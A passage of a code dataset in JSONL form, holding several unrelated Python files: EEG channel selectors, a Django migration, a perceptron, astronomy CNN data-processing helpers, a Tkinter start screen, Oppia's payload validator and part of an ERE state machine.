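word_to_id, id_to_word = create_mapping(freq)
print(word_to_id["<PAD>"], word_to_id["<UNK>"])  # 0 1
print(id_to_word[2])  # 'the' -- the most frequent real token
```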
X.shape[1]\n        y = yTile(y, self.T)\n        X = preReshape(X)\n        return SelectKBest.fit(self, X, y)\n\n    def transform(self, X):\n        X = preReshape(X)\n        X = SelectKBest.transform(self, X)\n        X = postReshape(X, self.T, self.k)\n        return X\n\n    def fit_transform(self, X, y):\n        self.T = X.shape[1]\n        y = np.tile(y, (self.T, 1)).T.reshape(-1)\n        X = preReshape(X)\n        SelectKBest.fit(self, X, y)\n        X = SelectKBest.transform(self, X)\n        X = postReshape(X, self.T, self.k)\n        return X\n\n\nclass ChannelsSelector2():\n\n    def __init__(self, k, kTime=20):\n        # Take best kTime points in the time domain\n        self.selector = SelectKBest(f_classif, k=kTime)\n        self.k = k\n\n    def fit(self, X, y, doPrint=False):\n        C = X.shape[2]\n        self.selectors = [None] * C\n        self.scores = np.zeros(C)\n        for c in range(C):\n            if (doPrint):\n                print('sensor {}'.format(c))\n            model = self.selector.fit(X[:, :, c], y)\n            scores = model.scores_[model._get_support_mask()]\n            self.scores[c] = np.mean(scores)\n        self.channelsIndices = np.argsort(self.scores)[::-1][:self.k]\n\n    def transform(self, X):\n        return X[:, :, self.channelsIndices]\n\n    def fit_transform(self, X, y):\n        self.fit(X, y)\n        return self.transform(X)\n\n\nclass ChannelsPCA(PCA):\n\n    def fit(self, X, y=None):\n        self.T = X.shape[1]\n        X = preReshape(X)\n        # normalize the data\n        self.scaler = preprocessing.StandardScaler().fit(X)\n        X = self.scaler.transform(X)\n        PCA.fit(self, X)\n        self.printExplainedVar()\n        return self\n\n    def transform(self, X):\n        X = preReshape(X)\n        X = self.scaler.transform(X)\n        X = PCA.transform(self, X)\n        X = postReshape(X, self.T, self.n_components)\n#        print(X.shape)\n        return X\n\n    def fit_transform(self, X, y=None):\n        self.T = X.shape[1]\n        X = preReshape(X)\n        # normalize the data\n        self.scaler = preprocessing.StandardScaler().fit(X)\n        X = self.scaler.transform(X)\n        self.printExplainedVar()\n        # Fit and transform\n        PCA.fit(self, X, y)\n        X = PCA.transform(self, X)\n        self.printExplainedVar()\n        X = postReshape(X, self.T, self.n_components)\n        return X\n\n    def printExplainedVar(self):\n        pass\n#        print ('explained variance ratio (first %d components): %.2f'%(\n#            self.n_components, sum(self.explained_variance_ratio_)))\n\n\ndef preReshape(X):\n    N, T, C = X.shape\n    return X.reshape((N * T, C))\n\n\ndef postReshape(X, T, k):\n    N = X.shape[0] // T\n    X = X.reshape((N, T, k))\n    return X\n\n\ndef yTile(y, T):\n    return np.tile(y, (T, 1)).T.reshape(-1)\n","sub_path":"src/commons/selectors/channelsSelector.py","file_name":"channelsSelector.py","file_ext":"py","file_size_in_byte":3156,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"404731297","text":"# -*- coding: utf-8 -*-\n\nfrom south.db import db\nfrom django.db import models\n\nclass Migration:\n\n    def forwards(self):\n        # Adding field 'UserAccess.selector'\n        ManagedObjectSelector=db.mock_model(model_name=\"ManagedObjectSelector\",db_table=\"sa_managedobjectselector\")\n        db.create_table('sa_managedobjectselectorbyattribute', (\n            ('id', models.AutoField(verbose_name='ID', primary_key=True, auto_created=True)),\n            ('selector', models.ForeignKey(ManagedObjectSelector,verbose_name=\"Object Selector\")),\n            ('key_re', models.CharField(\"Filter by key (REGEXP)\", max_length=256)),\n            ('value_re', models.CharField(\"Filter by value (REGEXP)\", max_length=256))\n        ))\n\n    def backwards(self):\n        # Deleting field 'UserAccess.selector'\n        
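The selectors above lean on one reshape trick: flatten trials × time into rows of channels, (N, T, C) → (N·T, C), and tile each trial's label T times so every time sample carries its trial's class; `postReshape` then restores (N, T, k) after selection. A shape check with random data (all dimensions arbitrary):

```python
import numpy as np

N, T, C, k = 4, 10, 6, 3          # trials, time points, channels, kept channels
X = np.random.randn(N, T, C)
y = np.array([0, 1, 0, 1])

X_flat = X.reshape(N * T, C)      # preReshape: every time sample becomes a row
y_flat = np.tile(y, (T, 1)).T.reshape(-1)   # yTile: each label repeated T times

print(X_flat.shape, y_flat.shape)  # (40, 6) (40,)
# y_flat keeps each trial's copies contiguous: [y0]*T, then [y1]*T, ...
assert (y_flat[:T] == y[0]).all() and (y_flat[T:2 * T] == y[1]).all()

X_kept = X_flat[:, :k]            # stand-in for SelectKBest.transform
X_back = X_kept.reshape(N, T, k)  # postReshape (note the integer N = rows // T)
print(X_back.shape)               # (4, 10, 3)
```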
db.delete_table('sa_managedobjectselectorbyattribute')\n\n","sub_path":"sa/migrations/0033_selector_by_attribute.py","file_name":"0033_selector_by_attribute.py","file_ext":"py","file_size_in_byte":861,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"530287689","text":"import matplotlib.pyplot as plt\nimport numpy as np\nimport pickle\n\n\n\"\"\"\nPlot the top-weighted features for classifcation.\n\"\"\"\n\n\ndef plot_coefficients(classifier, model_name, feature_set, feature_names, top_features=20):\n if top_features > len(feature_names):\n top_features = len(feature_names)\n\n coef = classifier.coef_.ravel()\n\n top_positive_coefficients = np.argsort(coef)[-top_features:]\n top_negative_coefficients = np.argsort(coef)[:top_features]\n top_coefficients = np.hstack([top_negative_coefficients, top_positive_coefficients])\n\n # create plot\n plt.figure(figsize=(15, 7))\n colors = ['crimson' if c < 0 else 'forestgreen' for c in coef[top_coefficients]]\n plt.bar(np.arange(2 * top_features), coef[top_coefficients], color=colors)\n feature_names = np.array(feature_names)\n ax = plt.gca()\n ax.set_facecolor('whitesmoke')\n plt.xticks(np.arange(1, 1 + 2 * top_features), feature_names[top_coefficients], rotation=60, ha='right')\n plt.savefig('./output/svm_' + feature_set + '_top_features.png', bbox_inches='tight')\n plt.show()\n\n\nfeature_set = 'STRUCT'\n\npath = './output/SVM_clf_30d_' + feature_set + '_args_for_coeff_mapping.pickle'\n\nargs = pickle.load(open(path, 'rb'))\n\nfeature_set = args['feature_set']\nfeature_names = args['feature_names']\nmodel_name = args['model_name']\nclf = args['clf']\n\nplot_coefficients(clf, model_name, feature_set, feature_names, top_features=20)","sub_path":"plot_coeffs.py","file_name":"plot_coeffs.py","file_ext":"py","file_size_in_byte":1433,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"6879213","text":"import numpy as np\n\n\ndef activation(x, deriv=False):\n \"\"\" Sigmoid \"\"\"\n if deriv:\n return activation(x) * (1 - activation(x))\n return 1 / (1 + np.exp(-x))\n\n\ndef loss_fn(y, y_h):\n \"\"\" Cross-Entropy \"\"\"\n return -y_h * np.log(y) - (1 - y_h) * np.log(1 - y)\n\n\ndef output_layer_deriv(y_h, y):\n return (y - y_h)\n\n\ndef hidden_layer_deriv():\n return None\n\n\nclass Perceptron(object):\n\n def __init__(self, num_layers, weights, biases, learning_rate):\n self._weights = weights\n self._biases = biases\n self.num_layers = num_layers\n self.eta = learning_rate\n\n def fit(self, x, y_h):\n for j in range(200000):\n for i in range(len(x)):\n y = self.forward(x[i])\n loss = loss_fn(y, y_h[i])\n self.backward(y_h[i], y, x[i])\n # print('loss:{}'.format(loss))\n\n if j % 10000 == 0:\n print(loss)\n\n def forward(self, x):\n # y = {0: x}\n # z = {}\n for layer in range(0, self.num_layers - 1):\n if layer == 0:\n z = x\n y = np.dot(self._weights, z) + self._biases\n z = activation(y)\n # print('layer:{} y:{} z:{}'.format(layer, y, z))\n return z\n\n def backward(self, y_h, y, x):\n dw = output_layer_deriv(y_h, y) * x\n db = output_layer_deriv(y_h, y)\n self._weights -= self.eta * dw\n self._biases -= self.eta * db\n # print(self._weights, self._biases)\n return None\n\n def predict(self, x):\n for i in range(len(x)):\n print(x[i], self.forward(x[i]))\n\n\nif __name__ == '__main__':\n\n x = np.array([[0, 0, 0], [0, 0, 1], [0, 1, 0], [0, 1, 1],\n [1, 0, 0], [1, 0, 1], [1, 1, 0], [1, 1, 1]])\n y_h = np.array([0, 0, 0, 0,\n 0, 0, 0, 
1]).reshape((8, 1))\n weights = [0.5 - np.random.rand(), 0.5 - np.random.rand(),\n 0.5 - np.random.rand()]\n biases = [0.5 - np.random.rand()]\n # print('weights:{}\\nbiases:{}'.format(weights, biases))\n model = Perceptron(2, weights, biases, learning_rate=0.1)\n model.fit(x, y_h)\n model.predict(x)\n","sub_path":"Perceptron.py","file_name":"Perceptron.py","file_ext":"py","file_size_in_byte":2172,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"448427611","text":"# import the necessary packages\n\nimport pandas as pd\nimport numpy as np\nimport glob\nimport cv2\nimport os\nimport matplotlib.pyplot as plt\nfrom tensorflow import keras as k\nprint(\"We are currently using the Modules_DPCNet\")\n\n\n\ndef parse_dataset(dataset_path, filtering=True):\n '''\n Input : Address to the data folder\n Outpur : Return a csv with parameter data and path to the image\n\n '''\n\n dataset = load_csv(dataset_path, filtering=filtering)\n images = []\n for i in dataset[\"Sample#\"]:\n imagePath = os.path.sep.join([dataset_path, \"Disk_dust_plots/dust1_gap_{}.jpg\".format(i)])\n images.append(imagePath)\n dataset[\"file\"] = images\n return dataset\n\n\ndef load_csv(folder_address, filtering=True):\n\n dataset0 = pd.concat(map(pd.read_csv, glob.glob(folder_address + '*.csv')), ignore_index=True)\n\n ################## DATA Filtering #############\n if filtering is True:\n\n # Filtering 1\n dataset0 = dataset0[dataset0['Dust_gap_1'] > 0.05] # filtering out very narrow gaps\n dataset = pd.concat([dataset0], ignore_index=True).sort_index() # important when merging multiple datasets\n # df = shuffle(dataset)\n # dataset = df.reset_index(drop=True)\n dataset['Planet_Mass'] = dataset['Planet_Mass'] / (3 * 10**-6) # writing in unit of earth mass\n\n # Filtering 2 (removing simualation with more than two gaps)\n dataset = dataset[dataset['#_DG'] < 2] # keeping one and two dust gap disks\n # dataset_filtered = dataset.drop(columns=['Sample#']) # dropping the Sample#\n\n # dataset_filtered.to_csv('data_folder/dataset_filered.csv') # saving the filtered data as csv file for future reference\n dataset = dataset.drop(columns=['Gas_gap_1', 'Dust_depth_1', 'Dust_gap_1', 'Dust_gap_2', 'Dust_depth_2', 'Gas_depth_1', '#_DG', '#_GG']) # droping the unimportant columns\n # dataset.to_csv('../data_folder/dataset_filered.csv')\n # dataset = dataset[['Sample#','Planet_Mass']] # droping the unimportant columns\n # dataset = dataset.sort_values(by=\"Sample#\")\n\n ## cleaning the data##\n dataset.isna().sum() # summing the number of na\n dataset0 = dataset.dropna()\n\n return dataset0\n\n\ndef parse_time_series_data(folder_addrss, list_of_orbits,path, data_filters=True):\n\n ''' Input : Address to the data folder and ahte orbits\n Output : Return a conacted csv with parameter data and path to the image with parse_dataset function\n '''\n dataset_complete = []\n # appended_data = []\n print(\"[INFO] preparing the dataframe from differnt times...\")\n for i in range(len(list_of_orbits)):\n\n folder_address = folder_addrss + list_of_orbits[i] + '/'\n\n print(\"Reading the image paths and data from folder:\", folder_address)\n # Loading the dataset for a given orbit\n dataset = parse_dataset(folder_address)\n\n # Appending the data from the pandas dataframe for each orbits\n dataset_complete.append(dataset)\n print(\"[INFO] The concatination of dataframes from differnt times are now complete\")\n dataset_complete = pd.concat(dataset_complete, ignore_index=True, axis=0)\n 
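In the Perceptron record above, `backward` uses dw = (y − t)·x with no σ′ factor — for a sigmoid output trained with cross-entropy, ∂L/∂z collapses to exactly (y − t), so the derivative of the activation cancels out of the weight gradient. A finite-difference check of that identity (weights and inputs arbitrary):

```python
import numpy as np

def sigmoid(z):
    return 1.0 / (1.0 + np.exp(-z))

def loss(w, b, x, t):
    # Same cross-entropy as loss_fn above, for a single example.
    y = sigmoid(np.dot(w, x) + b)
    return -t * np.log(y) - (1 - t) * np.log(1 - y)

w, b = np.array([0.2, -0.1, 0.4]), 0.05
x, t = np.array([1.0, 0.0, 1.0]), 1.0

# Analytic gradient used by backward() above: dL/dw = (y - t) * x
y = sigmoid(np.dot(w, x) + b)
analytic = (y - t) * x

# Central finite differences confirm the sigmoid' term really cancels.
eps, numeric = 1e-6, np.zeros_like(w)
for i in range(len(w)):
    step = np.zeros_like(w)
    step[i] = eps
    numeric[i] = (loss(w + step, b, x, t) - loss(w - step, b, x, t)) / (2 * eps)

print(np.allclose(analytic, numeric, atol=1e-6))  # True
```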
dataset_complete.to_csv(path+'data_folder/dataset_complete.csv') # saving as dataset_complete.csv\n return dataset_complete\n\n\ndef process_the_disk_attributes(train, test, path):\n\n ''' Input : train or test dataset\n path : to store the stats file\n Output : Return normalized data z normalization is used\n '''\n\n print(\"[INFO] preparing the normalized data training/testing split...\")\n try: \n train = train.drop(columns=['Sample#', 'file']) ## dropping the necessary files\n test = test.drop(columns=['Sample#', 'file']) ## dropping the necessary files\n except KeyError :\n pass\n \n train_stats = train.describe()\n train_stats.pop(\"Planet_Mass\")\n train_stats = train_stats.transpose()\n\n train_stats.to_csv(path+'data_folder/train_stats.csv')\n\n ## The labels are not normalized\n train_labels = train.pop(\"Planet_Mass\")\n test_labels = test.pop(\"Planet_Mass\")\n\n\n def norm(x):\n return (x - train_stats['mean']) / train_stats['std']\n normed_train_data = norm(train)\n\n normed_test_data = norm(test)\n# print(normed_train_data)\n print(\"[INFO] Done...\")\n return normed_train_data, normed_test_data, train_labels, test_labels\n\ndef process_data_for_test(test, path):\n\n ''' \n ### ADDED ON 7 JANUARY TO TEST DPCNET ON HIGH MASS DATA####\n\n Input : CSV containing data and path to the image\n path : to get the stat files from the original trained data\n Output : Return normalized data (z normalization is used)\n '''\n\n print(\"[INFO] preparing the normalized data TEST...\")\n try: \n # train = train.drop(columns=['Sample#', 'file']) ## dropping the necessary files\n test = test.drop(columns=['Sample#', 'file']) ## dropping the necessary files\n except KeyError :\n pass\n \n \n\n train_stats = pd.read_csv(path+'data_folder/train_stats.csv',index_col=0)\n # print(train_stats)\n ## The labels are not normalized\n \n test_labels = test.pop(\"Planet_Mass\")\n\n\n def norm(x):\n return (x - train_stats['mean']) / train_stats['std']\n \n\n normed_test_data = norm(test)\n# print(normed_train_data)\n print(\"[INFO] Done...\")\n return normed_test_data, test_labels\n\n\n\ndef load_disk_images(dataset, X_res, Y_res, Type):\n\n ''' Input : dataset with path to the images \n Output : Images set for either test or train\n '''\n\n print(\"[INFO] Loading images from {} data..\".format(Type))\n images = []\n for image_path in dataset[\"file\"]: \n\n # dimensions for cropping the image\n left = 44\n top = 44\n right = 556\n bottom = 556 \n ## read the image corresponding to the path\n try:\n imagePath = image_path ## for regular code \n # imagePath = '..'+image_path[33:] ## when reading path from the ones gnerated in COLAB as the address in COLAB gets modified\n image = cv2.imread(imagePath) \n crop_image = image[left:right, top:bottom]\n except TypeError:\n print(\"you may need to specify the correct path to the images\")\n imagePath = '..'+image_path[33:] ## when reading path from the ones gnerated in COLAB as the address in COLAB gets modified\n image = cv2.imread(imagePath) \n crop_image = image[left:right, top:bottom]\n \n crop_image = image[left:right, top:bottom]\n\n crop_image = cv2.resize(crop_image, (X_res, Y_res)) # downsizing the image\n # crop_image = crop_image/255.0 # scaling\n\n ## ADDED for image normalization (standadization) on 31 Jan 2021\n crop_image = k.preprocessing.image.img_to_array(crop_image) ## changing to numpy array\n datagen = k.preprocessing.image.ImageDataGenerator(samplewise_center=True, samplewise_std_normalization=True,rescale= 1.0/255.0)\n crop_image = 
datagen.standardize(np.copy(crop_image))\n images.append(crop_image)\n print(\"{} Images are loaded\".format(Type))\n return np.array(images)\n\n\n\n\ndef plot_history(history, path, Model,Network= None,res =None):\n try:\n hist = pd.DataFrame(history.history) ## is the data asalready a dataframe no need to convert\n path1 = path+'figures'\n except AttributeError:\n hist = history\n path1 = path+'figures_paper'\n hist['epoch'] = hist.index\n print(path1)\n plt.figure(figsize=(5, 5))\n plt.xlabel('Epoch')\n plt.ylabel('Mean Abs Error ($M_\\oplus$)')\n plt.plot(hist['epoch'], hist['mean_absolute_error'],\n label='Train ')\n plt.plot(hist['epoch'], hist['val_mean_absolute_error'],\n label='Val Error')\n plt.ylim([0, 30])\n plt.legend()\n \n if Model == 'CNN':\n plt.title(\"Single-input DPCNet\")\n if Network == None:\n plt.savefig(path1+'/MAEvalidation_loss_CNN.pdf', format='pdf', dpi=300)\n else:\n plt.savefig(path1+'/MAEvalidation_loss_{}_{}.pdf'.format(Network,str(res)), format='pdf', dpi=300)\n else:\n plt.title(\"Multi-input DPCNet\")\n if Network == None:\n plt.savefig(path1+'/MAEvalidation_loss_hybrid.pdf', format='pdf', dpi=300)\n else:\n plt.savefig(path1+'/MAEvalidation_loss_{}_{}_hybrid.pdf'.format(Network,str(res)), format='pdf', dpi=300)\n # plt.savefig(path1+'/MAEvalidation_loss_Hybrid.pdf', format='pdf', dpi=300)\n\n plt.figure(figsize=(5, 5))\n plt.xlabel('Epoch')\n plt.ylabel('Mean Square Error ($M_\\oplus^2$)')\n plt.plot(hist['epoch'], hist['mean_squared_error'],\n label='Train')\n plt.plot(hist['epoch'], hist['val_mean_squared_error'],\n label='Validation ')\n plt.ylim([0, 600])\n # plt.xlim([0,700])\n # plt.yscale(\"log\")\n plt.legend()\n plt.tick_params(labelsize=10)\n plt.tick_params(axis='both', which='major', length=6, width=2)\n plt.tick_params(axis='both', which='minor', length=3, width=1.3)\n plt.tight_layout()\n if Model == 'CNN':\n plt.title(\"Single-input DPCNet\")\n if Network == None:\n plt.savefig(path1+'/MSEvalidation_loss_CNN.pdf', format='pdf', dpi=300)\n else:\n plt.savefig(path1+'/MSEvalidation_loss_{}_{}.pdf'.format(Network,str(res)), format='pdf', dpi=300)\n # plt.savefig(path1+'/MSEvalidation_loss_CNN.pdf', format='pdf', dpi=300) \n else:\n plt.title(\"Multi-input DPCNet\")\n if Network == None:\n plt.savefig(path1+'/MSEvalidation_loss_hybrid.pdf', format='pdf', dpi=300)\n else:\n plt.savefig(path1+'/MSEvalidation_loss_{}_{}_hybrid.pdf'.format(Network,str(res)), format='pdf', dpi=300)\n #plt.savefig(path1+'/MSEvalidation_loss_Hybrid.pdf', format='pdf', dpi=300)\n\n plt.show()\n\n","sub_path":"MODULES_DPCNeT/data_processing.py","file_name":"data_processing.py","file_ext":"py","file_size_in_byte":9892,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"272105243","text":"######################################################\r\n# This program is to provide the player with a title screen\r\n# The Start game button starts the Main_Game program\r\n# The Go to Scoreboard button starts the Score_Board program\r\n######################################################\r\n\r\nfrom Tkinter import *\r\n\r\nclass StartPage(Frame):\r\n def __init(self, parent):\r\n Frame.__init__(self, parent)\r\n self.test = True\r\n\r\n\r\n def startMain_Game(self):\r\n self.test = False\r\n\r\n def startScore_Board(self):\r\n pass\r\n\r\n test = True\r\n\r\n def setup(self):\r\n TITLE_FONT = (\"Helvetica\", 18, \"bold\")\r\n LARGE_FONT = (\"Verdana\", 12)\r\n\r\n label = Label(text=\"This is the start page\", 
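`process_the_disk_attributes` above z-normalizes with the training split's mean/std and persists them to `train_stats.csv` precisely so `process_data_for_test` can apply the identical transform later — test data must never be scaled by its own statistics. A condensed sketch with toy columns (the hypothetical names below stand in for the real simulation parameters):

```python
import pandas as pd

# Toy frames with hypothetical disk-parameter columns.
train = pd.DataFrame({"Viscosity": [0.1, 0.3, 0.2],
                      "Aspect_Ratio": [0.03, 0.05, 0.07]})
test = pd.DataFrame({"Viscosity": [0.25], "Aspect_Ratio": [0.04]})

# describe().transpose() yields one row per column, incl. 'mean' and 'std' --
# this is what gets written to train_stats.csv above.
stats = train.describe().transpose()

def norm(df):
    # Reuse the TRAIN statistics for every split, exactly as norm() above does.
    return (df - stats["mean"]) / stats["std"]

print(norm(train).round(3))
print(norm(test).round(3))  # scaled with train mean/std, never its own
```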
font=TITLE_FONT)\r\n label.pack(side=\"top\", fill=\"x\", pady=10)\r\n\r\n button1 = Button(text=\"Start Game\", command = self.startMain_Game)\r\n\r\n button2 = Button(text=\"Go to Scoreboard\")\r\n\r\n button1.pack()\r\n button2.pack()\r\n\r\n def start(self):\r\n self.setup()\r\n\r\nwindow = Toplevel\r\n\r\n# create the GUI as a Tkinter canvas inside the window\r\ng = StartPage(window)\r\n# play the game\r\ng.start()\r\n\r\nwhile g.test:\r\n window.update()\r\n\r\n\r\nexecfile(\"test.py\")\r\n\r\n\r\n\r\n\r\n","sub_path":"start.py","file_name":"start.py","file_ext":"py","file_size_in_byte":1228,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"571508836","text":"# coding: utf-8\n\n# Copyright 2021 The Oppia Authors. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS-IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"Validates handler args against its schema by calling schema utils.\nAlso contains a list of handler class names which does not contain the schema.\n\"\"\"\n\nfrom __future__ import annotations\n\nfrom core import schema_utils\n\nfrom typing import Any, Dict, List, Optional, Tuple, Union\n\n\n# Here Dict[str, Any] is used for arg_schema because the value field of the\n# schema is itself a dict that can further contain several nested dicts.\ndef get_schema_type(arg_schema: Dict[str, Any]) -> str:\n \"\"\"Returns the schema type for an argument.\n\n Args:\n arg_schema: dict(str, *). Schema for an argument.\n\n Returns:\n str. Returns schema type by extracting it from schema.\n \"\"\"\n return arg_schema['schema']['type']\n\n\n# Here Dict[str, Any] is used for arg_schema because the value field of the\n# schema is itself a dict that can further contain several nested dicts.\ndef get_corresponding_key_for_object(arg_schema: Dict[str, Any]) -> str:\n \"\"\"Returns the new key for an argument from its schema.\n\n Args:\n arg_schema: dict(str, *). Schema for an argument.\n\n Returns:\n str. The new argument name.\n \"\"\"\n return arg_schema['schema']['new_key_for_argument']\n\n\n# This function recursively uses the schema dictionary and handler_args, and\n# passes their values to itself as arguments, so their type is Any.\n# See: https://github.com/python/mypy/issues/731\ndef validate_arguments_against_schema(\n handler_args: Any,\n handler_args_schemas: Any,\n allowed_extra_args: bool,\n allow_string_to_bool_conversion: bool = False\n) -> Tuple[Dict[str, Any], List[str]]:\n \"\"\"Calls schema utils for normalization of object against its schema\n and collects all the errors.\n\n Args:\n handler_args: *. Object for normalization.\n handler_args_schemas: dict. Schema for args.\n allowed_extra_args: bool. Whether extra args are allowed in handler.\n allow_string_to_bool_conversion: bool. Whether to allow string to\n boolean coversion.\n\n Returns:\n *. 
A two tuple, where the first element represents the normalized value\n in dict format and the second element represents the lists of errors\n after validation.\n \"\"\"\n # Collect all errors and present them at once.\n errors = []\n # Dictionary to hold normalized values of arguments after validation.\n normalized_values = {}\n for arg_key, arg_schema in handler_args_schemas.items():\n if arg_key not in handler_args or handler_args[arg_key] is None:\n if 'default_value' in arg_schema:\n if arg_schema['default_value'] is None:\n # Skip validation because the argument is optional.\n continue\n\n if arg_schema['default_value'] is not None:\n handler_args[arg_key] = arg_schema['default_value']\n else:\n errors.append('Missing key in handler args: %s.' % arg_key)\n continue\n\n # Below normalization is for arguments which are expected to be boolean\n # but from API request they are received as string type.\n if (\n allow_string_to_bool_conversion and\n get_schema_type(arg_schema) == schema_utils.SCHEMA_TYPE_BOOL\n and isinstance(handler_args[arg_key], str)\n ):\n handler_args[arg_key] = (\n convert_string_to_bool(handler_args[arg_key]))\n\n try:\n normalized_value = schema_utils.normalize_against_schema(\n handler_args[arg_key], arg_schema['schema'])\n\n # Modification of argument name if new_key_for_argument\n # field is present in the schema.\n if 'new_key_for_argument' in arg_schema['schema']:\n arg_key = get_corresponding_key_for_object(arg_schema)\n normalized_values[arg_key] = normalized_value\n except Exception as e:\n errors.append(\n 'Schema validation for \\'%s\\' failed: %s' % (arg_key, e))\n\n extra_args = set(handler_args.keys()) - set(handler_args_schemas.keys())\n\n if not allowed_extra_args and extra_args:\n errors.append('Found extra args: %s.' % (list(extra_args)))\n\n return normalized_values, errors\n\n\ndef convert_string_to_bool(param: str) -> Optional[Union[bool, str]]:\n \"\"\"Converts a request param of type string into expected bool type.\n\n Args:\n param: str. The params which needs normalization.\n\n Returns:\n bool. 
Converts the string param into its expected bool type.\n \"\"\"\n case_insensitive_param = param.lower()\n\n if case_insensitive_param == 'true':\n return True\n elif case_insensitive_param == 'false':\n return False\n else:\n # String values other than booleans should be returned as it is, so that\n # schema validation will raise exceptions appropriately.\n return param\n","sub_path":"core/controllers/payload_validator.py","file_name":"payload_validator.py","file_ext":"py","file_size_in_byte":5516,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"527357217","text":"import re\nfrom Concat import Concat\nfrom Empty import Empty\nfrom Epsilon import Epsilon\nfrom Kleene import Kleene\nfrom Negation import Negation\nfrom Or import Or\nfrom Symbol import Symbol\nfrom FSM import FSM\n\nclass EREMachine():\n\n def __init__(self, initerestring, events):\n #initial spec ERE to start from\n self.erestring = initerestring\n #all events relating to ERE\n self.events = events\n #dictionary of quick lookup terms\n self.t = r\"\\(|\\)|\\~|\\&|\\||\\*|\\+|epsilon|\\^|empty|\\w+\"\n self.initERE = self.genERE()\n self.symbolist = [Symbol.stringToRef[i] for i in self.events]\n self.fsm = FSM.getFSM(self.initERE, self.symbolist)\n self.currstate = self.initERE\n self.violated = False\n self.reported = False\n self.state_string = \"s0\"\n\n def update_state(self, symstring):\n statesymbol = Symbol.getERE(symstring)\n if statesymbol not in self.fsm.contents[self.currstate]:\n self.violated = True\n else:\n self.currstate = self.fsm.contents[self.currstate][statesymbol]\n self.set_state_string()\n #print(\"Proceeding to state \") + self.fsm.number[self.currstate]\n def reset_state(self):\n #reset current state to initial state\n self.currstate = self.initERE\n self.violated = False\n self.reported = False\n self.set_state_string()\n def set_state_string(self):\n self.state_string = self.fsm.number[self.currstate]\n\n def report_out(self):\n self.reported = True\n\n def genERE(self):\n plist = re.findall(self.t, self.erestring)\n plist = EREMachine.parse(plist)\n return EREMachine.makeERE(plist, self.events)\n\n #take list result and generate ERE recursively from inner lists\n @staticmethod\n def makeERE(erlist, symbols):\n if type(erlist) is list:\n negflag = False\n orflag = False\n catflag = False\n andflag = False\n #need some initial ERE to make sure this works correctly\n currentERE = Empty()\n for ind, obj in enumerate(erlist):\n if obj == \"*\":\n if ind == 0:\n raise SyntaxError(\"Kleene closure must be after stuff\")\n currentERE = Kleene.getERE(currentERE)\n elif obj == \"~\":\n negflag = True\n continue\n elif obj == \"|\":\n orflag = True\n continue\n elif obj == \"+\":\n catflag = True\n continue\n elif obj == \"&\":\n andflag = True\n continue\n else:\n if ind == 0|negflag:\n currentERE = EREMachine.makeERE(obj, symbols)\n elif orflag:\n currentERE = Or.getERE([currentERE, EREMachine.makeERE(obj,symbols)])\n orflag = False\n elif catflag:\n currentERE = Concat.getERE(currentERE, EREMachine.makeERE(obj, symbols))\n catflag = False\n elif andflag:\n currentERE = Negation.getERE(Concat.getERE(Negation.getERE(currentERE),Negation.getERE(EREMachine.makeERE(obj, symbols))))\n andflag = False\n else:\n currentERE = Concat.getERE(currentERE,EREMachine.makeERE(obj, symbols))\n if negflag:\n currentERE = Negation.getERE(currentERE)\n negflag = False\n return currentERE\n\n else:\n if erlist == 'empty':\n return Empty.getERE()\n elif erlist == 
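Putting the payload_validator pieces above together: the validator walks the args schema, fills defaults, optionally coerces `"true"`/`"false"` strings for bool-typed args, normalizes each value, and accumulates errors rather than failing fast. A toy run of the same flow — `schema_utils.normalize_against_schema` is Oppia-internal, so the `stub_normalize` below only type-checks, and the handler schema is hypothetical:

```python
# Hypothetical two-arg schema in the same shape the validator above expects.
schemas = {
    "exploration_id": {"schema": {"type": "unicode"}},
    "apply_draft": {"schema": {"type": "bool"}, "default_value": False},
}

def stub_normalize(value, schema):
    # Stand-in for schema_utils.normalize_against_schema (not shown here).
    expected = {"unicode": str, "bool": bool}[schema["type"]]
    if not isinstance(value, expected):
        raise Exception("expected %s, got %r" % (schema["type"], value))
    return value

def validate(handler_args, schemas):
    normalized, errors = {}, []
    for key, arg_schema in schemas.items():
        if key not in handler_args:
            if "default_value" in arg_schema:
                handler_args[key] = arg_schema["default_value"]
            else:
                errors.append("Missing key in handler args: %s." % key)
                continue
        value = handler_args[key]
        # String-to-bool coercion, as when allow_string_to_bool_conversion=True.
        if arg_schema["schema"]["type"] == "bool" and isinstance(value, str):
            value = {"true": True, "false": False}.get(value.lower(), value)
        try:
            normalized[key] = stub_normalize(value, arg_schema["schema"])
        except Exception as e:
            errors.append("Schema validation for '%s' failed: %s" % (key, e))
    return normalized, errors

print(validate({"exploration_id": "exp1", "apply_draft": "true"}, schemas))
# ({'exploration_id': 'exp1', 'apply_draft': True}, [])
```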
